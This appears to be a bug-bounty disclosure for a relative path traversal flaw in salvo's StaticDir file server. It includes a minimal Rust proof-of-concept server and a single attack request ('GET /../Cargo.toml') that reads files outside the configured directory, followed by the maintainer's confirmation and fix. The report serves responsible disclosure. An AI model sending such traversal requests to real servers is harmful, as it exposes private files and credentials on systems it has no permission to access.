Relative Path Traversal vulnerability in StaticDir server in salvo-rs/salvo

Valid

Reported on

Apr 17th 2022


Description

There is a relative path traversal vulnerability in the serve module of the extra crate. An attacker can simply request a relative path and access files outside of the configured directory root.

Proof of Concept

With a static folder in the project directory:

// main.rs
use salvo::extra::serve::{Options, StaticDir};
use salvo::prelude::*;

#[tokio::main]
async fn main() {
    let router = Router::with_path("<**path>")
        .get(StaticDir::width_options(vec!["static"], Options::default()));

    Server::new(TcpListener::bind("0.0.0.0:7878"))
        .serve(router)
        .await;
}

Example attack request:

GET /../Cargo.toml HTTP/1.1
Host: localhost

This serves the Cargo.toml file in the project directory, which is outside the static directory.

Impact

This vulnerability is capable of accessing any file on a server running Salvo.

We are processing your report and will contact the salvo-rs/salvo team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the salvo-rs/salvo team and are waiting to hear back a month ago
salvo-rs/salvo maintainer
a month ago

Maintainer


Tanks for your work, I have published a new version to fix this issue.

salvo-rs/salvo maintainer validated this vulnerability a month ago
William Henderson has been awarded the disclosure bounty
The fix bounty is now up for grabs
salvo-rs/salvo maintainer confirmed that a fix has been merged on 54815c a month ago
The fix bounty has been dropped
to join this conversation